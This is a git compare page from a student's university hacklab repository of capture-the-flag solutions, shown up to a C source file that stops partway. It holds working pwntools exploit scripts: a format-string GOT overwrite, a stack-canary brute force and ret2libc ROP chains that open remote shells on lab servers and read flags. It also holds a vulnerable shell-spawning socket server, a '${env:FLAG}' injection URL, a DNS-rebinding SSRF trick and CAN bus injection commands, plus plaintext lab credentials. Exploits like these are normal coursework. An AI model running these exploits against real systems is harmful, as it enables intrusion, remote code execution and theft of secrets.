ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: ejung:4c3e281ef5ee82c60172d97c37ab454057490a7d
Branches Tags
ejung:master
...
compare: ejung:master
Branches Tags
ejung:master

15 Commits
4c3e281ef5 ... master

Author SHA1 Message Date
Eggert Jung
3b32885263 add binary 2026-02-02 16:09:17 +01:00
Eggert Jung
e7a9ea4c8d remote 2026-02-02 16:05:13 +01:00
Eggert Jung
71feaaad5a 11 2026-01-28 12:57:01 +01:00
Eggert Jung
ded1ad9d4c 10 2026-01-27 02:16:46 +01:00
Eggert Jung
4d8dec9f15 can e2e 2026-01-26 23:12:54 +01:00
Eggert Jung
494a1f4d3b crc 2026-01-26 17:41:05 +01:00
Eggert Jung
8bfc87cd66 add binary 2026-01-26 16:02:55 +01:00
Eggert Jung
8d7ce9d468 tree 2026-01-26 15:27:29 +01:00
Eggert Jung
cb52c109de 5 2026-01-24 03:25:20 +01:00
Eggert Jung
7b011b5d2f add can 2026-01-24 03:19:53 +01:00
Eggert Jung
8e648891dd can 2026-01-22 00:21:54 +01:00
Eggert Jung
dca7fbe758 9 2026-01-07 19:12:31 +01:00
Eggert Jung
5ac340e112 8 2026-01-07 17:29:41 +01:00
Eggert Jung
3e0859b09e 7 2026-01-07 14:26:07 +01:00
Eggert Jung
a4dc06d7e1 howto execute 2026-01-06 15:57:31 +01:00
31 changed files with 26596 additions and 7 deletions
Expand all files Collapse all files

1
3/tree Normal file
View File

@@ -0,0 +1 @@
curl --request POST --user tree:QMyVgCs5SPT05pDaFO6wFGWjBiAuRcXO --header "Content-Type: application/json" --data '{"query":"query { secretcharacter { id name description } }"}' https://tree.web2.stud12.hacklab.ias.tu-bs.de/data

BIN
4/level10/level10 Executable file
View File

Binary file not shown.

39
4/level10/test.py Normal file
View File

@@ -0,0 +1,39 @@
#!/usr/bin/env python3
from pwn import *
elf = ELF('./level10')
# Addresses
exit_got = elf.got['exit']
win_addr = elf.symbols['win']
print("exit got: ", hex(exit_got))
print("win : ", hex(win_addr))
# Build a fmtstr payload that rewrites exit@GOT ? win()
# write_size='short' uses %hn twice for 2-byte writes
#for i in range(1,30):
#print("##################### ", i)
#p = process(elf.path)
p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
p.sendline(payload.encode())
context.clear(arch = 'amd64')
payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
# Send and get shell
p.recvuntil("talk about?".encode())
p.sendline(payload)
print("send: ", payload.hex())
res = p.recvline()
print("got: ", res)
p.interactive()
res = p.recvline()
print("got: ", res)
p.sendline("cat flag.txt")
print("send cat")
res = p.recvline()
print("got: ", res)

BIN
4/level11/core Normal file
View File

Binary file not shown.

1
4/level11/flag.txt Normal file
View File

@@ -0,0 +1 @@
hacklab{thanks_mario_but_the_flag_is_on_another_server}

BIN
4/level11/level11 Executable file
View File

Binary file not shown.

116
4/level11/level11.c Normal file
View File

@@ -0,0 +1,116 @@
// gcc -o level11 -no-pie -fstack-protector-all level11.c
#include <arpa/inet.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
const uint16_t port = 4011;
void win(int fd) {
// Connect stdin and stdout to the client socket,
// so they can interact with the shell.
dup2(fd, STDIN_FILENO);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
char *argv[2];
argv[0] = "/bin/sh";
argv[1] = NULL;
execve(argv[0], argv, NULL);
}
void prompt(int fd) {
char buffer[32];
send(fd, "What do you want to talk about?\n", 32, 0);
recv(fd, buffer, 120, 0);
}
void vuln(int fd) {
prompt(fd);
send(fd, "Bye.\n", 5, 0);
}
// forking socket server with help from
// https://github.com/pwning/docs/blob/master/fork_accept.c
int main(int argc, char **argv) {
// Setting the SIGCHLD handler to SIG_IGN prevents child
// processes from becoming zombies (so you do not need to
// call wait() on them).
if (signal(SIGCHLD, SIG_IGN) == SIG_ERR) {
fputs("Failed to set SIGCHLD handler.", stderr);
return 1;
}
// Create server socket.
int server_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (server_sock < 0) {
perror("socket");
return 1;
}
// Set SO_REUSEADDR. Otherwise, if the server crashes for
// any reason, you will have to wait for sockets to time
// out before you can reuse the port.
int opt = 1;
if (setsockopt(server_sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)) !=
0) {
perror("setsockopt");
return 1;
}
struct sockaddr_in listen_addr = {0};
bzero((char *)&listen_addr, sizeof(listen_addr));
listen_addr.sin_family = AF_INET;
listen_addr.sin_port = htons(port);
if (inet_pton(AF_INET, "127.0.0.1", &listen_addr.sin_addr) <= 0) {
perror("inet_pton");
return 1;
}
if (bind(server_sock, (struct sockaddr *)&listen_addr, sizeof(listen_addr)) !=
0) {
perror("bind");
return 1;
}
if (listen(server_sock, 5) != 0) {
perror("listen");
return 1;
}
int client_sock;
pid_t child_pid;
while (1) {
client_sock = accept(server_sock, NULL, NULL);
if (client_sock < 0) {
perror("accept");
continue;
}
child_pid = fork();
if (!child_pid) {
// Avoid tons of long-running processes sticking around.
alarm(30);
// If you do not close the socket fd, someone who
// exploits the service could call accept() on it and
// hijack other people's connections.
close(server_sock);
// Call the vulnerable code with the client socket.
vuln(client_sock);
close(client_sock);
return 0;
} else {
// If you forget to close the client fd, you could run
// out of file descriptors.
close(client_sock);
}
}
return 0;
}

57
4/level11/test.py Normal file
View File

@@ -0,0 +1,57 @@
#!/usr/bin/env python3
from pwn import *
import sys
import time
elf = ELF('./level11')
# Addresses
win_addr = elf.symbols['win']
print("win : ", hex(win_addr))
start = "aaaaaaaabbbbbbbbccccccccdddddddd12345678".encode()
oldflag = "hacklab{f0rm4t_7he_go7_l1ke_4_pr0_U6tZ6PMP}".encode()
local = False
def probe_canary(payl):
for i in range(0,255):
p = None
if(local):
p = remote("localhost", 4011)
else:
p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4011)
p.sendline(oldflag)
time.sleep(0.05)
p.recvuntil("talk about?".encode())
payload = payl + i.to_bytes(1, 'little')
p.send(payload)
print(payload)
resp = p.recvall(timeout=0.1);
if(resp == b'\nBye.\n'):
print("found byte ", end='')
print(hex(i))
if(len(payload) >= 56):
return payload
else:
return probe_canary(payload)
canary = probe_canary(start)
payload = canary + p64(win_addr)
print(payload)
print(payload[40:47].hex())
print(payload[48:55].hex())
print(payload[56:63].hex())
p = None
if(local):
p = remote("localhost", 4011)
else:
p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4011)
p.sendline(oldflag)
print(p.readline())
p.sendline(payload)
p.sendline("cat flag.txt; exit".encode())
print(p.recvall())

10
4/level6/test.sh
View File

@@ -1,15 +1,11 @@
# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
#objdump #objdump
#00000000004011d6 g F .text 000000000000003a win #00000000004011d6 g F .text 000000000000003a win
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n" OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64 PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
CMDADDR="\x48\x40\x40\00\00\00\00\00"
CMDCALL="\xd6\x11\x40\00\00\00\00\00" CMDCALL="\xd6\x11\x40\00\00\00\00\00"
#STACKPT="\x18\xde\xff\xff\xff\x7f\00\00"
STACKPT="\x02\00\00\00\00\00\00\00"
read read
read read
@@ -26,7 +22,7 @@ read input
>&2 echo $input >&2 echo $input
>&2 echo "writing canary + exploit" >&2 echo "writing canary + exploit"
printf "\00$PADDING""1234567\00${canary:0:7}$STACKPT$CMDCALL\n" printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
read input read input
>&2 echo "should be bye: "$input >&2 echo "should be bye: "$input
printf "cat flag.txt\n" printf "cat flag.txt\n"

BIN
4/level7/level7 Executable file
View File

Binary file not shown.

82
4/level7/test.py Normal file
View File

@@ -0,0 +1,82 @@
#!/usr/bin/env python3
from pwn import *
BINARY = "./level7"
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
#HOST, PORT = "localhost", 4007
elf = ELF(BINARY, checksec=False)
def main():
# 1) start remote
p = remote(HOST, PORT)
# 2) read the question
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
##############
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
# 3) build payload
#offset = 32
win = elf.symbols['win']
#payload = b"A"*offset
#payload += 0xa6#p64(win)
#payload += b"\n"
payload = "%7$p %9$p"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
leak = p.recvline(timeout=999)
print("[+] leak:", leak)
canary = int(leak[-35:-17],16)
pieaddr = int(leak[-16:-2],16)
print("[+] canary:", hex(canary))
print("[+] pieaddr:", hex(pieaddr))
question = p.recv(timeout=999)
print("[+] got username prompt:", question.decode().strip())
p.sendline("admin".encode())
print("sending username \"admin\"")
question = p.recvline(timeout=999)
print("[+] got username msg:", question.decode().strip())
question = p.recv(timeout=999)
print("[+] got password prompt:", question.decode().strip())
payload = b"A"*40
payload += p64(canary)
payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
p.sendline(payload)
print("sending payload: ", payload)
question = p.recvline(timeout=999)
print("[+] got login msg:", question.decode().strip())
# 5) we should now have a shell
p.interactive()
if __name__ == "__main__":
main()

52
4/level8/test.py Normal file
View File

@@ -0,0 +1,52 @@
# 0x0000000000401293 : pop rdi ; ret
from pwn import *
HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4008
p = remote(HOST, PORT)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
payload = "hacklab{0nly_n33d_0n3_7iny_1nfole4k_Bv4KxlTP}"
p.sendline(payload.encode())
print("sending: ", end='')
print(payload)
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
question = p.recvline(timeout=2)
print("[+] question:", question.decode().strip())
#p = process('./level8')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
system_offset = libc.symbols['system'] # e.g. 0x04f550
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))
#help_input = p.recvline()
help_input = p.recvline()
print(help_input)
puts_abs = int(help_input[-15:-1],16)
print(hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
payload += p64(0x0000000000401294)
payload += p64(0x0000000000401293)
payload += p64(puts_abs - puts_offset + binsh_offset)
payload += p64(puts_abs - puts_offset + system_offset)
p.sendline(payload)
print("payload: ",payload)
p.interactive()

78
4/level9/test.py Normal file
View File

@@ -0,0 +1,78 @@
# 0x0000000000401263 : pop rdi ; ret
from pwn import *
HOST, PORT = "localhost", 4009
#HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4009
#p = remote(HOST, PORT)
p = process('./level9')
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
#p.sendline(payload.encode())
#print("sending: ", end='')
#print(payload)
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
#
#question = p.recvline(timeout=2)
#print("[+] question:", question.decode().strip())
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] # e.g. 0x080aa0
system_offset = libc.symbols['system'] # e.g. 0x04f550
binsh_offset = next(libc.search(b'/bin/sh')) # e.g. 0x1b75aa
print(hex(puts_offset))
print(hex(system_offset))
print(hex(binsh_offset))
elf = ELF('./level9')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
#help_input = p.recvline()
#print(help_input)
#puts_abs = int(help_input[-15:-1],16)
#print(hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
payload += p64(0x0000000000401264)
payload += p64(0x0000000000401263)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
p.sendline(payload)
print("send payload: ", payload)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
leak = p.recvline(timeout=999)
print("[+] line:", leak)
puts_abs = int.from_bytes(leak[:-1], 'little')
print("[+] leaked puts:", hex(puts_abs))
p.recvuntil("What do you want to talk about?".encode())
payload = b'A'*40
#payload += p64(0x0000000000401264)
payload += p64(0x0000000000401263)
payload += p64(puts_abs - puts_offset + binsh_offset)
payload += p64(puts_abs - puts_offset + system_offset)
p.sendline(payload)
print("payload: ",payload)
p.sendline("cat flag.txt".encode())
p.interactive()

1
5/leakchecker1 Normal file
View File

@@ -0,0 +1 @@
https://leakchecker1.web3.stud12.hacklab.ias.tu-bs.de/search?email=%24%7Benv%3AFLAG%7D

2
5/screenr2/index.html Normal file
View File

@@ -0,0 +1,2 @@
<iframe src="http://localhost:9000/flag" name="iframe" id="iframe" scrolling="yes" frameborder="0" marginheight="0px" marginwidth="0px" height="2400" width="6000" style="zoom: 0.75">
</iframe>

13
5/screenr2/server.py Normal file
View File

@@ -0,0 +1,13 @@
#!/usr/bin/env python3
from http.server import SimpleHTTPRequestHandler, HTTPServer
PORT = 8000
def run_server():
handler = SimpleHTTPRequestHandler
httpd = HTTPServer(("", PORT), handler)
print(f"Serving HTTP on port {PORT} (http://localhost:{PORT}/) …")
httpd.serve_forever()
if __name__ == "__main__":
run_server()

5
5/screenr3/txt Normal file
View File

@@ -0,0 +1,5 @@
try multiple times:
http://7f000001.c0a80001.rbndr.us:9000/flag
dns switches randomly between allowed and not allowed address

1
6/CANformation2 Normal file
View File

@@ -0,0 +1 @@
candump -c getvin,65F:7FF -a

36
6/CANsmit1 Normal file
View File

@@ -0,0 +1,36 @@
cansmit1@hacklab-vehnet-stud12:~$ isotpdump -s 123 -d 321 twowires | sed -E 's/^[^W]*data: ([0-9A-Z ]*)$/\1/'& PID=$!; sleep 1.5; cansend twowires 123#3000000000000000; sleep 0.01; kill $PID
[1] 1234726
1F 8B 08 00 00 00
1F 8B 08 00 00 00
twowires 123 [8] [FC] FC: 0 = CTS # BS: 0 = off # STmin: 0x00 = 0 ms
00 00 00 03 CB 48 4C
CE CE 49 4C AA 4E 36
C8 2B 29 32 C8 89 37
C9 4B 89 2F 32 4E 4E
35 2C 4B 8D 2F 37 2C
C9 88 4F C9 4C 4B 33
2E 4A CD 33 8F 77 36
F1 8B 37 74 29 8E 2F
0C F5 34 76 73 0B 4B
AB E5 02 00 4F 84 76
1F 3D 00 00 00
cansmit1@hacklab-vehnet-stud12:~$
[1]+ Terminated isotpdump -s 123 -d 321 twowires | sed -E 's/^[^W]*data: ([0-9A-Z ]*)$/\1/'
cansmit1@hacklab-vehnet-stud12:~$ cat blob.txt
1F 8B 08 00 00 00
00 00 00 03 CB 48 4C
CE CE 49 4C AA 4E 36
C8 2B 29 32 C8 89 37
C9 4B 89 2F 32 4E 4E
35 2C 4B 8D 2F 37 2C
C9 88 4F C9 4C 4B 33
2E 4A CD 33 8F 77 36
F1 8B 37 74 29 8E 2F
0C F5 34 76 73 0B 4B
AB E5 02 00 4F 84 76
1F 3D 00 00 00
cansmit1@hacklab-vehnet-stud12:~$ xxd -r -p blob.txt > blob.gz
cansmit1@hacklab-vehnet-stud12:~$ gunzip blob.gz
gzip: blob already exists; do you wish to overwrite (y or n)? y
cansmit1@hacklab-vehnet-stud12:~$ cat blob
hacklab{c0ntr0l_4nd_r3ce1ve_w1th_diff3ren7_C4N_1Ds_qUI3FFVf}

12808
6/CANsmit2/dump Normal file
View File

File diff suppressed because it is too large Load Diff

12808
6/CANsmit2/frame Normal file
View File

File diff suppressed because it is too large Load Diff

189
6/CANsmit2/sortuniq Normal file
View File

@@ -0,0 +1,189 @@
89 50 4E 47 0D 0A 1A
0A 00 00 00 0D 49 48
44 52 00 00 01 68 00
00 00 F8 02 03 00 00
00 BC 9A 94 B1 00 00
00 04 67 41 4D 41 00
00 B1 8F 0B FC 61 05
00 00 00 20 63 48 52
4D 00 00 7A 26 00 00
80 84 00 00 FA 00 00
00 80 E8 00 00 75 30
00 00 EA 60 00 00 3A
98 00 00 17 70 9C BA
51 3C 00 00 00 09 50
4C 54 45 A8 A8 FE 42
42 E7 FF FF FE CD 44
BB C2 00 00 00 01 62
4B 47 44 02 66 0B 7C
64 00 00 00 09 70 48
59 73 00 00 0B 13 00
00 0B 13 01 00 9A 9C
18 00 00 00 07 74 49
4D 45 07 EA 01 13 0D
23 20 89 D8 87 7F 00
00 04 0A 49 44 41 54
78 DA ED 9B 4D 6E E4
38 0C 85 25 A0 B8 F7
A2 78 1F 6A D1 7B 0E
20 DD FF 2A C3 47 CA
2E C7 63 A7 DD E8 6A
4C 3A 20 53 55 B1 F5
F3 85 7A A4 E8 04 88
4A 49 4B 4B 4B 4B 4B
4B FB 2E 36 DE 6C 89
4E F4 D7 44 2B 29 35
6D AA 24 6C 6F 92 8A
B6 D1 C6 10 EA 8C 5E
BB 1B AD E1 F3 16 BA
4D 8B 2B 31 B3 6F 34
9B AC 6D D4 C0 B5 D6
79 1D B5 9F F5 09 3A
BC 71 7F 6C 82 14 29
6D 37 AF 8D 5E 27 68
18 3A 7E 58 DB CF FA
04 FD BA 07 BA 2D F6
E5 66 82 30 A4 68 2E
88 54 A5 0D 4D FB 59
B7 BD 86 D6 13 3D 41
52 A6 08 6D 45 EB B8
E9 F5 47 AD 27 9A FC
BD 2D 3F 46 84 D6 3A
DB 6F 68 7D 95 21 E6
EF 2E 43 10 C8 F0 B2
33 DA BF 4E 5E 27 3A
D1 DF 01 8D 9D D6 66
35 46 61 50 DF 73 52
A5 7A 99 98 75 A2 73
E7 8F 15 5B 7C A7 A2
60 D9 75 15 9F 71 40
A3 16 37 8A 6A 2C B2
AB 14 03 77 AF 7B A0
8F 15 1B A3 FC DA BD
6B 47 AF 51 8B 85 E7
23 60 2D AA C3 D1 21
57 D4 2B 56 3E 56 EC
89 1E 97 68 5F D8 88
6A DC 96 97 00 56 4E
17 90 3B EE EB 2A C8
AB 62 CB 1C E5 82 30
EA 3A 1C 3C 08 62 CF
14 4C E3 16 45 D8 7C
89 AA 1C 5A 8F 59 A5
3B 1F 2B 36 DA 5C 0D
7B 09 9F 09 82 D5 40
6B 0A 74 68 F9 42 7F
D4 FA 55 B1 57 F4 D4
9A 4E D0 6B 86 84 A4
B8 47 16 A0 1E EF 33
24 E2 BF AF D8 E2 59
13 19 E2 CF D3 FF 66
C8 DF B9 65 12 9D E8
FF 09 8D 82 E3 A5 A8
FD 3E F6 80 C6 1E B7
1A 4C 7F 08 7D FC 95
F0 7D 82 A0 10 5D FC
F9 F0 7B 68 6E F3 79
F1 7E 41 C8 D1 14 F5
F8 BD E8 06 39 84 FF
00 FA 3D 32 9C A2 DF
0D 4F 74 A2 BF 02 FA
BD E0 44 27 3A D1 89
4E 74 A2 13 9D E8 44
27 3A D1 89 4E 74 A2
13 9D E8 44 27 3A D1
89 4E 74 A2 13 9D E8
44 27 3A D1 89 4E 74
A2 13 9D E8 44 27 3A
D1 89 4E F4 F7 42 77
9A AD 3A 86 C4 37 9C
82 1B BD C4 F5 F0 7F
E2 F7 6B 2D E8 90 6E
D3 EA E8 1C DD 5A 07
0E 4A C8 2F A0 B5 F0
6B FC 11 4D 05 68 EF
96 E2 C7 20 80 BF 81
F6 26 B1 CF 89 AE B3
3D 16 F1 4F E7 4E 85
57 74 8D C3 11 FD 17
D0 38 54 17 A1 E8 04
97 36 34 28 D5 D1 DE
4D 9D 2E D1 8F 3A A4
E2 B4 07 BC 2B A4 62
83 3B D4 74 B9 6D EE
83 3A 7B 77 A0 C5 D1
D6 66 DD 5A 89 C6 A3
70 59 4E D1 F6 E1 2F
ED 64 32 56 13 D4 DC
2C 36 65 74 3F 7A 52
1E E6 61 74 97 0D 5D
71 16 65 31 A1 1D FD
2C E5 14 5D F5 49 98
A7 CA A2 8C 03 39 F8
19 F4 30 9F DC 4D 9B
D5 9F D1 5D 22 08 A6
75 6D 9D 15 0B 31 34
35 E5 73 34 F5 27 AB
BD 54 86 A8 BD 58 A1
1E 95 C2 71 3E 04 FE
CD EE E7 96 21 55 FC
B8 91 69 67 6B B4 0B
B9 40 5B 86 3E ED 5D
10 46 A3 DB 4D 03 91
EA 0E 8D 6E 3F F6 E9
68 B6 A5 DA 1B 68 5B
8A A3 E9 1C 2D 65 45
9B A6 43 17 47 0F A2
03 DA 8F DD 84 83 D5
9A C8 D1 16 49 A0 47
3D 47 17 47 2F 0C 87
80 06 02 E1 F1 2D B2
A2 17 FE 80 7E 58 EC
2A C1 D9 40 B7 73 AD
C9 96 D7 3D 94 0C 41
2C 98 E3 C7 0E 8D 68
A0 FB C7 0E 3D 36 74
68 3D E8 93 30 2E 40
47 18 0D 5D 4D 90 31
05 A1 D9 DD F6 E8 82
1A B2 0B E3 15 5A CC
71 6C 19 1D 25 92 6F
E0 73 A2 07 72 D3 BB
67 18 1D 2D 40 5B F2
55 24 EC 75 F2 A1 DE
98 C8 4D B4 94 65 6E
19 29 BC A2 C5 77 D4
68 BA E6 35 1A 15 DD
82 71 A3 F5 72 85 E6
62 5B C2 E2 2D 16 46
5D E6 46 DF 8A 6A 45
51 F5 EE 5E F8 80 D6
87 65 88 C9 54 4E F3
FA C4 B6 8A F5 73 5B
87 BE 1F 4D 41 D4 B1
9E 79 F8 E9 03 EC 36
BA C6 13 40 B9 DE 45
6F A7 7D F5 30 C4 E2
55 78 77 3F 4F FC F5
42 7A 13 7D FB 18 CA
26 F5 FA 98 F8 06 BF
2C 24 3A D1 89 4E 74
A2 FF 06 74 5A 5A 5A
5A 5A 5A 5A DA 85 FD
0B DA 17 18 4A 9E 9D
FF B0 00 00 00 25 74
45 58 74 64 61 74 65
3A 63 72 65 61 74 65
00 32 30 32 36 2D 30
31 2D 31 39 54 31 33
3A 33 35 3A 32 39 2B
30 30 3A 30 30 7B E1
1B E4 00 00 00 25 74
45 58 74 64 61 74 65
3A 6D 6F 64 69 66 79
00 32 30 32 33 2D 30
38 2D 31 31 54 31 32
3A 32 38 3A 30 30 2B
30 30 3A 30 30 D2 3E
99 51 00 00 00 00 49
45 4E 44 AE 42 60 82

1
6/CANsmit2/test.sh Executable file
View File

@@ -0,0 +1 @@
cut -d ' ' -f10-18 dump | sort | uniq | cut -d ' ' -f 2-8 | xxd -r -p | feh -

71
6/CANsmit3/Makefile Normal file
View File

@@ -0,0 +1,71 @@
#
# Copyright (c) 2002-2005 Volkswagen Group Electronic Research
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions, the following disclaimer and
# the referenced file 'COPYING'.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Volkswagen nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# Alternatively, provided that this notice is retained in full, this
# software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as distributed in the 'COPYING'
# file from the main directory of the linux kernel source.
#
# The provided data structures and external interfaces from this code
# are not restricted to be used by modules with a GPL compatible license.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
#
# Send feedback to <linux-can@vger.kernel.org>
DESTDIR ?=
PREFIX ?= /usr/local
MAKEFLAGS := -k
CFLAGS := -O2 -Wall -Wno-parentheses
CPPFLAGS += \
-Iinclude \
-DAF_CAN=PF_CAN \
-DPF_CAN=29 \
-DSO_RXQ_OVFL=40 \
-DSCM_TIMESTAMPING_OPT_STATS=54 \
-D_FILE_OFFSET_BITS=64 \
-D_GNU_SOURCE
PROGRAMS := isotpterm
all: $(PROGRAMS)
clean:
rm -f $(PROGRAMS) *.o
install:
mkdir -p $(DESTDIR)$(PREFIX)/bin
cp -f $(PROGRAMS) $(DESTDIR)$(PREFIX)/bin
distclean:
rm -f $(PROGRAMS) $(LIBRARIES) *.o *~
$(CC) $(LDFLAGS) $^ $(LDLIBS) -o $@

15
6/CANsmit3/README Normal file
View File

@@ -0,0 +1,15 @@
Watch Offline Profile Reader
----
You've got the latest of entertainment systems in your new car, but the system
can only be used while standing still. You want to watch your series in the
background while driving though. It won't distract you, since you know all 23
seasons by heart.
The system requires you to prove you're not driving by testing your attention.
You can't look away from the road that long, so you decide to write a script to
help you unlock the feature for you.
The system is tightly integrated with the rest of the car and communicates over
ISOTP ports 241 and 242 on interface "wopr". Your profile's username is `falken`
and your password is `Joshua`.

BIN
6/CANsmit3/isotpterm Executable file
View File

Binary file not shown.

183
6/CANsmit3/isotpterm.c Normal file
View File

@@ -0,0 +1,183 @@
/*
* isotpterm.c - interactive terminal over isotp
*/
#include <errno.h>
#include <libgen.h>
#include <linux/can.h>
#include <linux/can/isotp.h>
#include <net/if.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define NO_CAN_ID 0xFFFFFFFFU
#define MAX_PDU_LENGTH 8000
void print_usage(char *prg) {
fprintf(stderr,
"\nUsage: %s -s <can_id> -d <can_id> [options] <CAN interface>\n",
prg);
fprintf(stderr, "Options:\n");
fprintf(stderr,
" -s <can_id> * (source can_id. Use 8 digits for extended "
"IDs)\n");
fprintf(stderr,
" -d <can_id> * (destination can_id. Use 8 digits for "
"extended IDs)\n");
fprintf(stderr, "\n");
}
int main(int argc, char **argv) {
extern int optind, opterr, optopt;
int opt;
int sc = 0; /* (C)AN socket */
struct sockaddr_can caddr;
static struct can_isotp_options opts;
socklen_t caddrlen = sizeof(caddr);
fd_set readfds;
int nbytes;
int ret = 0;
char *fgetsret = NULL;
char txmsg[MAX_PDU_LENGTH];
char rxmsg[MAX_PDU_LENGTH];
/* mark missing mandatory commandline options as missing */
caddr.can_addr.tp.tx_id = caddr.can_addr.tp.rx_id = NO_CAN_ID;
while ((opt = getopt(argc, argv, "s:d:?")) != -1) {
switch (opt) {
case 's':
caddr.can_addr.tp.tx_id = strtoul(optarg, (char **)NULL, 16);
if (strlen(optarg) > 7) caddr.can_addr.tp.tx_id |= CAN_EFF_FLAG;
break;
case 'd':
caddr.can_addr.tp.rx_id = strtoul(optarg, (char **)NULL, 16);
if (strlen(optarg) > 7) caddr.can_addr.tp.rx_id |= CAN_EFF_FLAG;
break;
case '?':
print_usage(basename(argv[0]));
ret = 1; /* no proper operation (for non-interactive users) */
goto exit;
default:
fprintf(stderr, "Unknown option %c\n", opt);
print_usage(basename(argv[0]));
ret = 1;
goto exit;
}
}
if ((argc - optind != 1) || (caddr.can_addr.tp.tx_id == NO_CAN_ID) ||
(caddr.can_addr.tp.rx_id == NO_CAN_ID)) {
print_usage(basename(argv[0]));
ret = -EINVAL;
goto exit;
}
if ((sc = socket(PF_CAN, SOCK_DGRAM, CAN_ISOTP)) < 0) {
perror("socket");
ret = sc;
goto exit;
}
opts.flags = CAN_ISOTP_WAIT_TX_DONE;
setsockopt(sc, SOL_CAN_ISOTP, CAN_ISOTP_OPTS, &opts, sizeof(opts));
caddr.can_family = AF_CAN;
caddr.can_ifindex = if_nametoindex(argv[optind]);
ret = bind(sc, (struct sockaddr *)&caddr, caddrlen);
if (ret < 0) {
perror("bind");
goto exit;
}
while (1) {
FD_ZERO(&readfds);
